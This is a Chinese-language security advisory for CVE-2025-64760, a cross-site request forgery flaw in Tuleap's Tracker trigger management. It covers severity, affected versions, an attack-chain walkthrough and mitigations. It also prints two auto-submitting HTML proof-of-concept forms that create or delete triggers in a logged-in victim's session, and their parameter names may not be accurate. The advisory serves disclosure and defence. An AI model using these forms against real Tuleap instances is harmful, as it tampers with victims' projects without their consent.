CVE-2025-64760 Tuleap CSRF漏洞允许创建或删除Tracker触发器

漏洞信息

漏洞编号

CVE-2025-64760

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Tuleap Community Edition / Tuleap Enterprise Edition

漏洞概述

CVE-2025-64760是Tuleap项目管理平台中的一个中危跨站请求伪造（CSRF）漏洞。Tuleap是一套免费开源的软件开发和协作管理套件，广泛应用于企业级项目管理、代码托管、问题追踪等场景。该漏洞影响Tuleap Community Edition 17.0.99.1763126988之前的版本以及Tuleap Enterprise Edition 17.0-3和16.13-8之前的版本。漏洞源于应用程序缺少适当的CSRF令牌验证机制，允许未经授权的第三方通过诱导已登录用户访问恶意页面，在用户不知情的情况下执行非预期的操作。攻击者利用此漏洞可以创建新的Tracker触发器或删除现有的触发器，从而可能破坏业务流程、篡改数据或造成服务中断。由于CSRF攻击利用的是用户已认证的身份，因此攻击门槛相对较低，只要目标用户访问攻击者精心构造的网页即可成功实施攻击。

技术细节

该CSRF漏洞存在于Tuleap的Tracker触发器管理功能中。Tracker是Tuleap系统中用于管理项目任务、缺陷和需求的核心组件，触发器（Triggers）则用于在特定事件发生时自动执行预定义的操作。漏洞的根本原因是相关功能模块缺少CSRF Token验证。攻击者可以构造一个恶意HTML页面，其中包含自动提交的表单，该表单模拟合法的Tracker触发器创建或删除请求。当已登录的Tuleap用户访问该恶意页面时，浏览器会自动携带用户的会话Cookie向目标Tuleap服务器发送请求。由于服务器无法区分这是用户主动发送的请求还是被诱导发送的请求，攻击者的恶意操作会被当作合法请求执行。攻击者通常会将恶意页面托管在第三方服务器上，通过钓鱼邮件、社交工程等方式诱导目标用户访问。成功利用此漏洞可能导致Tracker业务逻辑被篡改、数据完整性受损等安全问题。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tuleap实例上存在漏洞的Tracker触发器管理功能，分析请求参数和目标URL

STEP 2

步骤2

攻击者构造恶意HTML页面，包含自动提交的表单，模拟合法的Tracker触发器创建或删除请求

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或恶意链接等方式诱导已登录的Tuleap用户访问恶意页面

STEP 4

步骤4

用户浏览器自动携带有效会话Cookie向Tuleap服务器发送恶意请求

STEP 5

步骤5

Tuleap服务器因缺少CSRF验证，将恶意请求当作合法用户操作执行，成功创建或删除Tracker触发器

STEP 6

步骤6

攻击者达到破坏业务流程、篡改数据或造成服务中断的恶意目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64760 - Create Tracker Trigger -->
<!DOCTYPE html>
<html>
<head>
    <title>Tracker Trigger Creation</title>
</head>
<body>
    <h1>Loading...</h1>
    <form id="csrfForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="func" value="admin-formCreateTrigger" />
        <input type="hidden" name="tracker_id" value="123" />
        <input type="hidden" name="trigger_name" value="malicious_trigger" />
        <input type="hidden" name="trigger_condition" value="on_update" />
        <input type="hidden" name="trigger_action" value="send_email" />
    </form>
    <script>
        // Auto-submit the form without user interaction
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- CSRF PoC for CVE-2025-64760 - Delete Tracker Trigger -->
<!DOCTYPE html>
<html>
<head>
    <title>Tracker Trigger Deletion</title>
</head>
<body>
    <form id="deleteForm" action="https://target-tuleap-instance/plugins/tracker/?aid=45618" method="POST">
        <input type="hidden" name="func" value="admin-deleteTrigger" />
        <input type="hidden" name="tracker_id" value="123" />
        <input type="hidden" name="trigger_id" value="456" />
        <input type="hidden" name="confirm" value="1" />
    </form>
    <script>
        document.getElementById('deleteForm').submit();
    </script>
</body>
</html>

影响范围

Tuleap Community Edition < 17.0.99.1763126988

Tuleap Enterprise Edition < 17.0-3

Tuleap Enterprise Edition < 16.13-8

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 启用Web应用防火墙（WAF）规则检测异常的Tracker操作请求；2) 监控日志中的异常触发器创建/删除行为；3) 限制Tracker管理功能的访问权限，仅允许受信任的IP地址访问；4) 定期检查并审计现有Tracker触发器的配置，及时发现未授权的变更。